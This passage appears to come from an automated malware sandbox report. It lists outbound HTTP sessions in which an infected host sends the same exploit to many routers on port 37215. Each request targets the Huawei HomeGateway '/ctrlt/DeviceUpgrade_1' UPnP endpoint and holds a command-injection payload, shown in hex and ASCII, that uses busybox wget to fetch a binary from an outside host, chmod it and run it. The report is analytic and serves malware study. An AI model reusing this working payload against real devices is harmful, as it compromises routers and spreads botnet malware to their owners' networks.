                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1586192.168.2.155018041.65.58.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108923912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1587192.168.2.154245841.207.59.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108932018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1588192.168.2.153886841.93.162.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108933926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1589192.168.2.153507241.212.28.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108933926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1590192.168.2.155064841.128.107.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108933926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1591192.168.2.154204841.41.98.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108992100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1592192.168.2.155531841.204.237.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108992100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1593192.168.2.153928441.40.134.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108999968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1594192.168.2.154952641.233.90.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109025955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1595192.168.2.155054441.208.13.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109030008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 